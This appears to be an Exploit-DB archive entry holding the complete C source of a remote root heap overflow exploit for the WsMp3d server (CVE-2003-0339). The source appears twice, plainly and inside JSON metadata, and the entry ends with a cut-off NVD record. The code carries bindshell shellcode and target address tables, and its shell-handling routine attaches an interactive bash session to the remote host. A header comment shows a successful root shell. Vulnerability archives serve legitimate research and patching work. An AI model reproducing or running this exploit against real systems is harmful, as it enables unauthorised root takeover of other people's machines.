ID EDB-ID:33
Type exploitdb
Reporter Xpl017Elz
Modified 2003-05-22T00:00:00
Description
WsMp3d 0.x Remote Root Heap Overflow Exploit. CVE-2003-0339. Remote exploit for linux platform
/*
**
** [*] Title: Remote Heap Corruption Overflow vulnerability in WsMp3d
** [+] Exploit: 0x82-Remote.WsMp3d.again.c
**
** bash$ ./0x82--Remote.WsMp3d.again -h 61.37.xxx.xx -t2
**
** WsMp3 Server Heap Corruption Remote root exploit
** by Xpl017Elz.
** [+] Hostname: 61.37.xxx.xx
** [+] Port num: 8000
** [+] Retloc address: 0x8058d8c
** [+] Retaddr address: 0x80648bf
** [1] #1 Set socket.
** [2] First, send exploit packet.
** [3] #2 Set socket.
** [4] Second, send exploit packet.
** [5] Waiting, executes the shell ! (3Sec)
** [6] Trying 61.37.xxx.xx:36864 ...
** [7] Connected to 61.37.xxx.xx:36864 !
**
** [*] Executed shell successfully !
**
** Linux xpl017elz 2.2.12-20kr #1 Tue Oct 12 17:08:15 KST 1999 i586 unknown
** uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),
** 6(disk),10(wheel)
** bash#
**
**
*/
#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
struct op_plat_st
{
int op_plat_num;
char *op_plat_sys;
u_long retloc;
u_long retaddr;
int off_st;
};
struct op_plat_st __pl_form[]=
{
/*{num,linux,globl val,heap val}*/
{0,"Linux WsMp3 Binary I (Default)",0x08059490,0x08064e8f,0},
{1,"Linux WsMp3 Binary II (Default)",0x08059490,0x08063e97,0},
//08058d8c R_386_JUMP_SLOT malloc
{2,"RedHat Linux 6.1 (Compile)",0x08058d8c,0x080648bf,0},
{3,"RedHat Linux 6.2 (Compile)",0x08058d8c,0x080646f3,0},
{4,"RedHat Linux 7.0 (Compile)",0x0809aa68,0x080a5cb3,0},
{5,"Linux all DoS (Compile)",0x82828282,0x82828282,0},
/* {6,"RedHat Linux 7.1",0x0,0x0,1},
{7,"RedHat Linux 8.0",0x0,0x82828282,1},
{8,"RedHat Linux 9.0",0x0,0x82828282,1},
*/
{0x82,NULL,0,0,0}
};
int sexsock(char *conn_host_nm,int conn_port_nm);
void start_shell(int st_sock_va);
void re_connt_lm(int st_sock_va);
void __xpl_banrl();
void x_fp_rm_usage(char *x_fp_rm);
int __eat_sucks_heap_data_send(int st_sock_va,u_long fd_sx,u_long bk_sx);
void __xpl_banrl()
{
fprintf(stdout,"\n WsMp3 Server Heap Corruption Remote root exploit (Again)\n");
fprintf(stdout," by Xpl017Elz.\n");
}
void x_fp_rm_usage(char *x_fp_rm)
{
int __t_xmp=0;
fprintf(stdout,"\n Usage: %s -[option] [arguments]\n\n",x_fp_rm);
fprintf(stdout,"\t -h [hostname] - target host.\n");
fprintf(stdout,"\t -p [port] - port number.\n");
fprintf(stdout,"\t -r [addr] - retloc address. (malloc globl)\n");
fprintf(stdout,"\t -s [addr] - &shellcode address.\n\n");
fprintf(stdout," Example> %s -h target_hostname -p 8000\n",x_fp_rm);
fprintf(stdout," Select target number>\n\n");
for(;;)
{
if(__pl_form[__t_xmp].op_plat_num==(0x82))
break;
else
{
fprintf(stdout,"\t {%d} %s\n",__pl_form[__t_xmp].op_plat_num,__pl_form[__t_xmp].op_plat_sys);
}
__t_xmp++;
}
fprintf(stdout,"\n");
exit(0);
}
/*
** name: desc->action (free)
** content: chat cmd ("CHA")
** content size: 3
** buffer size: 4+12 (Bin:1000[0])
**
** name: desc->what
** content: garbage (clear)
** content size: 1024
** buffer size: 4+4+1+1024 (Bin:1000000100[1])
*/
int __eat_sucks_heap_data_send(int st_sock_va,u_long fd_sx,u_long bk_sx)
{
int wy_clean_data_q;
char nop_n_jump[]={0x42,0x0c,0xeb,0x41};
int atk_buf_pos=0;
char oxa_oxd[]={0x0a,0x0d};
#define PORT_Q (36864)
#define __CLN_DT_LEN ((0x00000400)+(0x00000001))
char step_atk_code_st[PORT_Q];
#define __OF_BY_ONE (0x01)
char p_rev_size[]={0xfc,0xff,0xff,0xff}; /* chunk size */
char __size_fd[]={0xff,0xff,0xff,0xff}; /* data section size */
char cln_dt_buf[__CLN_DT_LEN];
char chat_inf_send_code[]={0x43,0x48,0x41};
char shellcode[]={
/* bindshell port 36864 */
0xeb,0x72,0x5e,0x29,0xc0,0x89,0x46,0x10,
0x40,0x89,0xc3,0x89,0x46,0x0c,0x40,0x89,
0x46,0x08,0x8d,0x4e,0x08,0xb0,0x66,0xcd,
0x80,0x43,0xc6,0x46,0x10,0x10,0x66,0x89,
0x5e,0x14,0x88,0x46,0x08,0x29,0xc0,0x89,
0xc2,0x89,0x46,0x18,0xb0,0x90,0x66,0x89,
0x46,0x16,0x8d,0x4e,0x14,0x89,0x4e,0x0c,
0x8d,0x4e,0x08,0xb0,0x66,0xcd,0x80,0x89,
0x5e,0x0c,0x43,0x43,0xb0,0x66,0xcd,0x80,
0x89,0x56,0x0c,0x89,0x56,0x10,0xb0,0x66,
0x43,0xcd,0x80,0x86,0xc3,0xb0,0x3f,0x29,
0xc9,0xcd,0x80,0xb0,0x3f,0x41,0xcd,0x80,
0xb0,0x3f,0x41,0xcd,0x80,0x88,0x56,0x07,
0x89,0x76,0x0c,0x87,0xf3,0x8d,0x4b,0x0c,
0xb0,0x0b,0xcd,0x80,0xe8,0x89,0xff,0xff,
0xff,0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68
};
int send_shcode_lsz=sizeof(shellcode);
memset((char *)cln_dt_buf,0x82,sizeof(cln_dt_buf));
memset((char *)step_atk_code_st,0,sizeof(step_atk_code_st));
/*
desc->action:malloc(10); // cleanup
*/
memcpy(step_atk_code_st+atk_buf_pos,chat_inf_send_code,sizeof(chat_inf_send_code));
atk_buf_pos+=(sizeof(chat_inf_send_code));
memset(step_atk_code_st+atk_buf_pos,0x20,__OF_BY_ONE);
atk_buf_pos+=(__OF_BY_ONE);
/*
void rem_req_descriptor(req_descriptor *desc);
desc->what[sizeof(desc->what)]='\0';free(desc->what);desc->what=NULL;
*/
memcpy(step_atk_code_st+atk_buf_pos,cln_dt_buf,sizeof(cln_dt_buf));
atk_buf_pos+=(sizeof(cln_dt_buf));
/* chunk size */
memcpy(step_atk_code_st+atk_buf_pos,p_rev_size,sizeof(p_rev_size));
atk_buf_pos+=(sizeof(p_rev_size));
/* data section size */
memcpy(step_atk_code_st+atk_buf_pos,__size_fd,sizeof(__size_fd));
atk_buf_pos+=(sizeof(__size_fd));
{
*(long *)&step_atk_code_st[atk_buf_pos]=(fd_sx-(0x0c));
atk_buf_pos+=4; /* forward ptr */
*(long *)&step_atk_code_st[atk_buf_pos]=(bk_sx);
atk_buf_pos+=4; /* back ptr */
}
memset(step_atk_code_st+atk_buf_pos,0x20,__OF_BY_ONE);
atk_buf_pos+=(__OF_BY_ONE);
for(wy_clean_data_q=0;wy_clean_data_q<0x190;wy_clean_data_q+=4)
{
memcpy(step_atk_code_st+atk_buf_pos,nop_n_jump,sizeof(nop_n_jump));
atk_buf_pos+=(sizeof(nop_n_jump));
}
memcpy(step_atk_code_st+atk_buf_pos,shellcode,sizeof(shellcode));
atk_buf_pos+=(sizeof(shellcode));
memcpy(step_atk_code_st+atk_buf_pos,oxa_oxd,sizeof(oxa_oxd));
atk_buf_pos+=(sizeof(oxa_oxd));
send(st_sock_va,step_atk_code_st,strlen(step_atk_code_st),0);
return(st_sock_va);
}
int main(int argc,char *argv[])
{
int sock,tg_sk;
#define D_PORT (8000)
#define ATK_CPT (36864)
int port=(D_PORT);
#define D_HOST "x82.inetcop.org"
char hostname[0x82]=D_HOST;
int whlp,type=0;
u_long retloc=__pl_form[type].retloc;
u_long retaddr=__pl_form[type].retaddr;
(void)__xpl_banrl();
while((whlp=getopt(argc,argv,"T:t:R:r:S:s:H:h:P:p:IiXx"))!=EOF)
{
extern char *optarg;
switch(whlp)
{
case 'T':
case 't':
if((type=atoi(optarg))<6)
{
retloc=__pl_form[type].retloc;
retaddr=__pl_form[type].retaddr;
}
else (void)x_fp_rm_usage(argv[0]);
break;
case 'R':
case 'r':
retloc=strtoul(optarg,NULL,0);
break;
case 'S':
case 's':
retaddr=strtoul(optarg,NULL,0);
break;
case 'H':
case 'h':
memset((char *)hostname,0,sizeof(hostname));
strncpy(hostname,optarg,sizeof(hostname)-1);
break;
case 'P':
case 'p':
port=atoi(optarg);
break;
case 'I':
case 'i':
fprintf(stderr," Try `%s -?' for more information.\n\n",argv[0]);
exit(-1);
case '?':
(void)x_fp_rm_usage(argv[0]);
break;
}
}
if(!strcmp(hostname,D_HOST))
{
(void)x_fp_rm_usage(argv[0]);
}
{
fprintf(stdout," [+] Hostname: %s\n",hostname);
fprintf(stdout," [+] Port num: %d\n",port);
fprintf(stdout," [+] Retloc address: %p\n",retloc);
fprintf(stdout," [+] Retaddr address: %p\n",retaddr);
}
fprintf(stdout," [1] #1 Set socket.\n");
sock=(int)sexsock(hostname,port);
(void)re_connt_lm(sock);
fprintf(stdout," [2] First, send exploit packet.\n");
sock=(int)__eat_sucks_heap_data_send(sock,retloc,retaddr);
close(sock);
fprintf(stdout," [3] #2 Set socket.\n");
sock=(int)sexsock(hostname,port);
(void)re_connt_lm(sock);
fprintf(stdout," [4] Second, send exploit packet.\n");
sock=(int)__eat_sucks_heap_data_send(sock,retloc,retaddr);
fprintf(stdout," [5] Waiting, executes the shell ! (3Sec)\n");
sleep(3);
fprintf(stdout," [6] Trying %s:%d ...\n",hostname,(ATK_CPT));
tg_sk=(int)sexsock(hostname,(ATK_CPT));
(void)re_connt_lm(tg_sk);
fprintf(stdout," [7] Connected to %s:%d !\n\n",hostname,(ATK_CPT));
(void)start_shell(tg_sk);
exit(0);
}
int sexsock(char *conn_host_nm,int conn_port_nm)
{
int sock;
struct hostent *sxp;
struct sockaddr_in sxp_addr;
if((sxp=gethostbyname(conn_host_nm))==NULL)
{
herror(" [-] gethostbyname() error");
return(-1);
}
if((sock=socket(AF_INET,SOCK_STREAM,0))==-1)
{
perror(" [-] socket() error");
return(-1);
}
sxp_addr.sin_family=AF_INET;
sxp_addr.sin_port=htons(conn_port_nm);
sxp_addr.sin_addr=*((struct in_addr*)sxp->h_addr);
bzero(&(sxp_addr.sin_zero),8);
if(connect(sock,(struct sockaddr *)&sxp_addr,sizeof(struct sockaddr))==-1)
{
perror(" [-] connect() error");
return(-1);
}
return(sock);
}
void start_shell(int st_sock_va)
{
int died;
char *command="uname -a; id; export TERM=vt100; exec bash -i\n";
char readbuf[1024];
fd_set rset;
memset((char *)readbuf,0,sizeof(readbuf));
fprintf(stdout," [*] Executed shell successfully !\n\n");
send(st_sock_va,command,strlen(command),0);
for(;;)
{
fflush(stdout);
FD_ZERO(&rset);
FD_SET(st_sock_va,&rset);
FD_SET(STDIN_FILENO,&rset);
select(st_sock_va+1,&rset,NULL,NULL,NULL);
if(FD_ISSET(st_sock_va,&rset))
{
died=read(st_sock_va,readbuf,sizeof(readbuf)-1);
if(died<=0)
exit(0);
readbuf[died]=0;
fprintf(stdout,"%s",readbuf);
}
if(FD_ISSET(STDIN_FILENO,&rset))
{
died=read(STDIN_FILENO,readbuf,sizeof(readbuf)-1);
if(died>0)
{
readbuf[died]=0;
write(st_sock_va,readbuf,died);
}
}
}
return;
}
void re_connt_lm(int st_sock_va)
{
if(st_sock_va==-1)
{
fprintf(stdout," [-] Failed.\n\n");
fprintf(stdout," Happy Exploit ! :-)\n\n");
exit(-1);
}
}
// milw0rm.com [2003-05-22]
{"id": "EDB-ID:33", "type": "exploitdb", "bulletinFamily": "exploit", "title": "WsMp3d 0.x - Remote Root Heap Overflow Exploit", "description": "WsMp3d 0.x Remote Root Heap Overflow Exploit. CVE-2003-0339. Remote exploit for linux platform", "published": "2003-05-22T00:00:00", "modified": "2003-05-22T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/33/", "reporter": "Xpl017Elz", "references": [], "cvelist": ["CVE-2003-0339"], "lastseen": "2016-01-31T11:18:52", "viewCount": 9, "enchantments": {"score": {"value": 7.9, "vector": "NONE", "modified": "2016-01-31T11:18:52", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2003-0339"]}, {"type": "osvdb", "idList": ["OSVDB:12028"]}], "modified": "2016-01-31T11:18:52", "rev": 2}, "vulnersScore": 7.9}, "sourceHref": "https://www.exploit-db.com/download/33/", "sourceData": "/*\r\n**\r\n** [*] Title: Remote Heap Corruption Overflow vulnerability in WsMp3d\r\n** [+] Exploit: 0x82-Remote.WsMp3d.again.c\r\n**\r\n** bash$ ./0x82--Remote.WsMp3d.again -h 61.37.xxx.xx -t2\r\n**\r\n** WsMp3 Server Heap Corruption Remote root exploit\r\n** by Xpl017Elz.\r\n** [+] Hostname: 61.37.xxx.xx\r\n** [+] Port num: 8000\r\n** [+] Retloc address: 0x8058d8c\r\n** [+] Retaddr address: 0x80648bf\r\n** [1] #1 Set socket.\r\n** [2] First, send exploit packet.\r\n** [3] #2 Set socket.\r\n** [4] Second, send exploit packet.\r\n** [5] Waiting, executes the shell ! (3Sec)\r\n** [6] Trying 61.37.xxx.xx:36864 ...\r\n** [7] Connected to 61.37.xxx.xx:36864 !\r\n**\r\n** [*] Executed shell successfully !\r\n**\r\n** Linux xpl017elz 2.2.12-20kr #1 Tue Oct 12 17:08:15 KST 1999 i586 unknown\r\n** uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),\r\n** 6(disk),10(wheel)\r\n** bash#\r\n**\r\n**\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <unistd.h>\r\n#include <sys/socket.h>\r\n#include <netdb.h>\r\n#include <netinet/in.h>\r\n\r\nstruct op_plat_st\r\n{\r\n\tint op_plat_num;\r\n\tchar *op_plat_sys;\r\n\tu_long retloc;\r\n\tu_long retaddr;\r\n\tint off_st;\r\n};\r\nstruct op_plat_st __pl_form[]=\r\n{\r\n\t/*{num,linux,globl val,heap val}*/\r\n\t{0,\"Linux WsMp3 Binary I (Default)\",0x08059490,0x08064e8f,0},\r\n\t{1,\"Linux WsMp3 Binary II (Default)\",0x08059490,0x08063e97,0},\r\n\t//08058d8c R_386_JUMP_SLOT malloc\r\n\t{2,\"RedHat Linux 6.1 (Compile)\",0x08058d8c,0x080648bf,0},\r\n\t{3,\"RedHat Linux 6.2 (Compile)\",0x08058d8c,0x080646f3,0},\r\n\t{4,\"RedHat Linux 7.0 (Compile)\",0x0809aa68,0x080a5cb3,0},\r\n\t{5,\"Linux all DoS (Compile)\",0x82828282,0x82828282,0},\r\n/*\t{6,\"RedHat Linux 7.1\",0x0,0x0,1},\r\n\t{7,\"RedHat Linux 8.0\",0x0,0x82828282,1},\r\n\t{8,\"RedHat Linux 9.0\",0x0,0x82828282,1},\r\n*/\r\n\t{0x82,NULL,0,0,0}\r\n};\r\n\r\nint sexsock(char *conn_host_nm,int conn_port_nm);\r\nvoid start_shell(int st_sock_va);\r\nvoid re_connt_lm(int st_sock_va);\r\nvoid __xpl_banrl();\r\nvoid x_fp_rm_usage(char *x_fp_rm);\r\nint __eat_sucks_heap_data_send(int st_sock_va,u_long fd_sx,u_long bk_sx);\r\n\r\nvoid __xpl_banrl()\r\n{\r\n\tfprintf(stdout,\"\\n WsMp3 Server Heap Corruption Remote root exploit (Again)\\n\");\r\n\tfprintf(stdout,\" by Xpl017Elz.\\n\");\r\n}\r\n\r\nvoid x_fp_rm_usage(char *x_fp_rm)\r\n{\r\n\tint __t_xmp=0;\r\n\tfprintf(stdout,\"\\n Usage: %s -[option] [arguments]\\n\\n\",x_fp_rm);\r\n\tfprintf(stdout,\"\\t -h [hostname] - target host.\\n\");\r\n\tfprintf(stdout,\"\\t -p [port] - port number.\\n\");\r\n\tfprintf(stdout,\"\\t -r [addr] - retloc address. (malloc globl)\\n\");\r\n\tfprintf(stdout,\"\\t -s [addr] - &shellcode address.\\n\\n\");\r\n\tfprintf(stdout,\" Example> %s -h target_hostname -p 8000\\n\",x_fp_rm);\r\n\tfprintf(stdout,\" Select target number>\\n\\n\");\r\n\tfor(;;)\r\n\t{\r\n\t\tif(__pl_form[__t_xmp].op_plat_num==(0x82))\r\n\t\t\tbreak;\r\n\t\telse\r\n\t\t{\r\n\t\t\t\r\nfprintf(stdout,\"\\t {%d} %s\\n\",__pl_form[__t_xmp].op_plat_num,__pl_form[__t_xmp].op_plat_sys);\r\n\t\t}\r\n\t\t__t_xmp++;\r\n\t}\r\n\tfprintf(stdout,\"\\n\");\r\n\texit(0);\r\n}\r\n\r\n/*\r\n** name: desc->action (free)\r\n** content: chat cmd (\"CHA\")\r\n** content size: 3\r\n** buffer size: 4+12 (Bin:1000[0])\r\n**\r\n** name: desc->what\r\n** content: garbage (clear)\r\n** content size: 1024\r\n** buffer size: 4+4+1+1024 (Bin:1000000100[1])\r\n*/\r\n\r\nint __eat_sucks_heap_data_send(int st_sock_va,u_long fd_sx,u_long bk_sx)\r\n{\r\n\tint wy_clean_data_q;\r\n\tchar nop_n_jump[]={0x42,0x0c,0xeb,0x41};\r\n\tint atk_buf_pos=0;\r\n\tchar oxa_oxd[]={0x0a,0x0d};\r\n#define PORT_Q (36864)\r\n#define __CLN_DT_LEN ((0x00000400)+(0x00000001))\r\n\tchar step_atk_code_st[PORT_Q];\r\n#define __OF_BY_ONE (0x01)\r\n\tchar p_rev_size[]={0xfc,0xff,0xff,0xff}; /* chunk size */\r\n\tchar __size_fd[]={0xff,0xff,0xff,0xff}; /* data section size */\r\n\tchar cln_dt_buf[__CLN_DT_LEN];\r\n\tchar chat_inf_send_code[]={0x43,0x48,0x41};\r\n\tchar shellcode[]={\r\n\t\t/* bindshell port 36864 */\r\n\t\t0xeb,0x72,0x5e,0x29,0xc0,0x89,0x46,0x10,\r\n\t\t0x40,0x89,0xc3,0x89,0x46,0x0c,0x40,0x89,\r\n\t\t0x46,0x08,0x8d,0x4e,0x08,0xb0,0x66,0xcd,\r\n\t\t0x80,0x43,0xc6,0x46,0x10,0x10,0x66,0x89,\r\n\t\t0x5e,0x14,0x88,0x46,0x08,0x29,0xc0,0x89,\r\n\t\t0xc2,0x89,0x46,0x18,0xb0,0x90,0x66,0x89,\r\n\t\t0x46,0x16,0x8d,0x4e,0x14,0x89,0x4e,0x0c,\r\n\t\t0x8d,0x4e,0x08,0xb0,0x66,0xcd,0x80,0x89,\r\n\t\t0x5e,0x0c,0x43,0x43,0xb0,0x66,0xcd,0x80,\r\n\t\t0x89,0x56,0x0c,0x89,0x56,0x10,0xb0,0x66,\r\n\t\t0x43,0xcd,0x80,0x86,0xc3,0xb0,0x3f,0x29,\r\n\t\t0xc9,0xcd,0x80,0xb0,0x3f,0x41,0xcd,0x80,\r\n\t\t0xb0,0x3f,0x41,0xcd,0x80,0x88,0x56,0x07,\r\n\t\t0x89,0x76,0x0c,0x87,0xf3,0x8d,0x4b,0x0c,\r\n\t\t0xb0,0x0b,0xcd,0x80,0xe8,0x89,0xff,0xff,\r\n\t\t0xff,0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68\r\n\t};\r\n\tint send_shcode_lsz=sizeof(shellcode);\r\n\r\n\tmemset((char *)cln_dt_buf,0x82,sizeof(cln_dt_buf));\r\n\tmemset((char *)step_atk_code_st,0,sizeof(step_atk_code_st));\r\n\t/*\r\n\tdesc->action:malloc(10); // cleanup\r\n\t*/\r\n\tmemcpy(step_atk_code_st+atk_buf_pos,chat_inf_send_code,sizeof(chat_inf_send_code));\r\n\tatk_buf_pos+=(sizeof(chat_inf_send_code));\r\n\tmemset(step_atk_code_st+atk_buf_pos,0x20,__OF_BY_ONE);\r\n\tatk_buf_pos+=(__OF_BY_ONE);\r\n\t/*\r\n\tvoid rem_req_descriptor(req_descriptor *desc);\r\n\tdesc->what[sizeof(desc->what)]='\\0';free(desc->what);desc->what=NULL;\r\n\t*/\r\n\tmemcpy(step_atk_code_st+atk_buf_pos,cln_dt_buf,sizeof(cln_dt_buf));\r\n\tatk_buf_pos+=(sizeof(cln_dt_buf));\r\n\t/* chunk size */\r\n\tmemcpy(step_atk_code_st+atk_buf_pos,p_rev_size,sizeof(p_rev_size));\r\n\tatk_buf_pos+=(sizeof(p_rev_size));\r\n\t/* data section size */\r\n\tmemcpy(step_atk_code_st+atk_buf_pos,__size_fd,sizeof(__size_fd));\r\n\tatk_buf_pos+=(sizeof(__size_fd));\r\n\t{\r\n\t\t*(long *)&step_atk_code_st[atk_buf_pos]=(fd_sx-(0x0c));\r\n\t\tatk_buf_pos+=4; /* forward ptr */\r\n\t\t*(long *)&step_atk_code_st[atk_buf_pos]=(bk_sx);\r\n\t\tatk_buf_pos+=4; /* back ptr */\r\n\t}\r\n\tmemset(step_atk_code_st+atk_buf_pos,0x20,__OF_BY_ONE);\r\n\tatk_buf_pos+=(__OF_BY_ONE);\r\n\tfor(wy_clean_data_q=0;wy_clean_data_q<0x190;wy_clean_data_q+=4)\r\n\t{\r\n\t\tmemcpy(step_atk_code_st+atk_buf_pos,nop_n_jump,sizeof(nop_n_jump));\r\n\t\tatk_buf_pos+=(sizeof(nop_n_jump));\r\n\t}\r\n\tmemcpy(step_atk_code_st+atk_buf_pos,shellcode,sizeof(shellcode));\r\n\tatk_buf_pos+=(sizeof(shellcode));\r\n\tmemcpy(step_atk_code_st+atk_buf_pos,oxa_oxd,sizeof(oxa_oxd));\r\n\tatk_buf_pos+=(sizeof(oxa_oxd));\r\n\r\n\tsend(st_sock_va,step_atk_code_st,strlen(step_atk_code_st),0);\r\n\treturn(st_sock_va);\r\n}\r\n\r\nint main(int argc,char *argv[])\r\n{\r\n\tint sock,tg_sk;\r\n#define D_PORT (8000)\r\n#define ATK_CPT (36864)\r\n\tint port=(D_PORT);\r\n#define D_HOST \"x82.inetcop.org\"\r\n\tchar hostname[0x82]=D_HOST;\r\n\tint whlp,type=0;\r\n\r\n\tu_long retloc=__pl_form[type].retloc;\r\n\tu_long retaddr=__pl_form[type].retaddr;\r\n\r\n\t(void)__xpl_banrl();\r\n\twhile((whlp=getopt(argc,argv,\"T:t:R:r:S:s:H:h:P:p:IiXx\"))!=EOF)\r\n\t{\r\n\t\textern char *optarg;\r\n\t\tswitch(whlp)\r\n\t\t{\r\n\t\t\tcase 'T':\r\n\t\t\tcase 't':\r\n\t\t\t\tif((type=atoi(optarg))<6)\r\n\t\t\t\t{\r\n\t\t\t\t\tretloc=__pl_form[type].retloc;\r\n\t\t\t\t\tretaddr=__pl_form[type].retaddr;\r\n\t\t\t\t}\r\n\t\t\t\telse (void)x_fp_rm_usage(argv[0]);\r\n\t\t\t\tbreak;\r\n\r\n\t\t\tcase 'R':\r\n\t\t\tcase 'r':\r\n\t\t\t\tretloc=strtoul(optarg,NULL,0);\r\n\t\t\t\tbreak;\r\n\t\t\t\t\r\n\t\t\tcase 'S':\r\n\t\t\tcase 's':\r\n\t\t\t\tretaddr=strtoul(optarg,NULL,0);\r\n\t\t\t\tbreak;\r\n\t\t\t\t\r\n\t\t\tcase 'H':\r\n\t\t\tcase 'h':\r\n\t\t\t\tmemset((char *)hostname,0,sizeof(hostname));\r\n\t\t\t\tstrncpy(hostname,optarg,sizeof(hostname)-1);\r\n\t\t\t\tbreak;\r\n\t\t\t\t\r\n\t\t\tcase 'P':\r\n\t\t\tcase 'p':\r\n\t\t\t\tport=atoi(optarg);\r\n\t\t\t\tbreak;\r\n\t\t\t\t\r\n\t\t\tcase 'I':\r\n\t\t\tcase 'i':\r\n\t\t\t\tfprintf(stderr,\" Try `%s -?' for more information.\\n\\n\",argv[0]);\r\n\t\t\t\texit(-1);\r\n\t\t\t\t\r\n\t\t\tcase '?':\r\n\t\t\t\t(void)x_fp_rm_usage(argv[0]);\r\n\t\t\t\tbreak;\r\n\t\t}\r\n\t}\r\n\t\r\n\tif(!strcmp(hostname,D_HOST))\r\n\t{\r\n\t\t(void)x_fp_rm_usage(argv[0]);\r\n\t}\r\n\t{\r\n\t\tfprintf(stdout,\" [+] Hostname: %s\\n\",hostname);\r\n\t\tfprintf(stdout,\" [+] Port num: %d\\n\",port);\r\n\t\tfprintf(stdout,\" [+] Retloc address: %p\\n\",retloc);\r\n\t\tfprintf(stdout,\" [+] Retaddr address: %p\\n\",retaddr);\r\n\t}\r\n\tfprintf(stdout,\" [1] #1 Set socket.\\n\");\r\n\tsock=(int)sexsock(hostname,port);\r\n\t(void)re_connt_lm(sock);\r\n\t\r\n\tfprintf(stdout,\" [2] First, send exploit packet.\\n\");\r\n\tsock=(int)__eat_sucks_heap_data_send(sock,retloc,retaddr);\r\n\tclose(sock);\r\n\t\r\n\tfprintf(stdout,\" [3] #2 Set socket.\\n\");\r\n\tsock=(int)sexsock(hostname,port);\r\n\t(void)re_connt_lm(sock);\r\n\t\r\n\tfprintf(stdout,\" [4] Second, send exploit packet.\\n\");\r\n\tsock=(int)__eat_sucks_heap_data_send(sock,retloc,retaddr);\r\n\t\r\n\tfprintf(stdout,\" [5] Waiting, executes the shell ! (3Sec)\\n\");\r\n\tsleep(3);\r\n\t\r\n\tfprintf(stdout,\" [6] Trying %s:%d ...\\n\",hostname,(ATK_CPT));\r\n\ttg_sk=(int)sexsock(hostname,(ATK_CPT));\r\n\t(void)re_connt_lm(tg_sk);\r\n\r\n\tfprintf(stdout,\" [7] Connected to %s:%d !\\n\\n\",hostname,(ATK_CPT));\r\n\t(void)start_shell(tg_sk);\r\n\r\n\texit(0);\r\n}\r\n\r\nint sexsock(char *conn_host_nm,int conn_port_nm)\r\n{\r\n\tint sock;\r\n\tstruct hostent *sxp;\r\n\tstruct sockaddr_in sxp_addr;\r\n \r\n\tif((sxp=gethostbyname(conn_host_nm))==NULL)\r\n\t{\r\n\t\therror(\" [-] gethostbyname() error\");\r\n\t\treturn(-1);\r\n\t}\r\n\tif((sock=socket(AF_INET,SOCK_STREAM,0))==-1)\r\n\t{\r\n\t\tperror(\" [-] socket() error\");\r\n\t\treturn(-1);\r\n\t}\r\n\tsxp_addr.sin_family=AF_INET;\r\n\tsxp_addr.sin_port=htons(conn_port_nm);\r\n\tsxp_addr.sin_addr=*((struct in_addr*)sxp->h_addr);\r\n\tbzero(&(sxp_addr.sin_zero),8);\r\n\r\n\tif(connect(sock,(struct sockaddr *)&sxp_addr,sizeof(struct sockaddr))==-1)\r\n\t{\r\n\t\tperror(\" [-] connect() error\");\r\n\t\treturn(-1);\r\n\t}\r\n\r\n\treturn(sock);\r\n}\r\n\r\nvoid start_shell(int st_sock_va)\r\n{\r\n\tint died;\r\n\tchar *command=\"uname -a; id; export TERM=vt100; exec bash -i\\n\";\r\n\tchar readbuf[1024];\r\n\tfd_set rset;\r\n\tmemset((char *)readbuf,0,sizeof(readbuf));\r\n\tfprintf(stdout,\" [*] Executed shell successfully !\\n\\n\");\r\n\tsend(st_sock_va,command,strlen(command),0);\r\n\r\n\tfor(;;)\r\n\t{\r\n\t\tfflush(stdout);\r\n\t\tFD_ZERO(&rset);\r\n\t\tFD_SET(st_sock_va,&rset);\r\n\t\tFD_SET(STDIN_FILENO,&rset);\r\n\t\tselect(st_sock_va+1,&rset,NULL,NULL,NULL);\r\n\r\n\t\tif(FD_ISSET(st_sock_va,&rset))\r\n\t\t{\r\n\t\t\tdied=read(st_sock_va,readbuf,sizeof(readbuf)-1);\r\n\t\t\tif(died<=0)\r\n\t\t\t\texit(0);\r\n\t\t\treadbuf[died]=0;\r\n\t\t\tfprintf(stdout,\"%s\",readbuf);\r\n\t\t}\r\n\t\tif(FD_ISSET(STDIN_FILENO,&rset))\r\n\t\t{\r\n\t\t\tdied=read(STDIN_FILENO,readbuf,sizeof(readbuf)-1);\r\n\t\t\tif(died>0)\r\n\t\t\t{\r\n\t\t\t\treadbuf[died]=0;\r\n\t\t\t\twrite(st_sock_va,readbuf,died);\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\treturn;\r\n}\r\n\r\nvoid re_connt_lm(int st_sock_va)\r\n{\r\n\tif(st_sock_va==-1)\r\n\t{\r\n\t\tfprintf(stdout,\" [-] Failed.\\n\\n\");\r\n\t\tfprintf(stdout,\" Happy Exploit ! :-)\\n\\n\");\r\n\t\texit(-1);\r\n\t}\r\n}\r\n\n\n// milw0rm.com [2003-05-22]\n", "osvdbidlist": ["12028"]}
{"cve": [{"lastseen": "2020-10-03T11:33:02", "description": "Multiple heap-based buffer overflows in WsMp3 daemon (WsMp3d) 0.0.10 and earlier allow remote attackers to execute arbitrary code via long HTTP requests.", "edition": 3, "cvss3": {}, "published": "2003-05-22T04:00:00", "title": "CVE-2003-0339", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": true}, "cvelist": ["CVE-2003-0339"], "modified": "2016-10-18T02:32:00", "cpe": ["cpe:/a:wsmp3:wsmp3_daemon:0.0.8", "cpe:/a:wsmp3:wsmp3_daemon:0.0.9", "cpe:/a:wsmp3:wsmp3_web_server:0.0.7", "cpe:/a:wsmp3:wsmp3_daemon:0.0.10"], "id": "CVE-2003-0339", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0339", "cvss": {"score": 7.5, "vector": 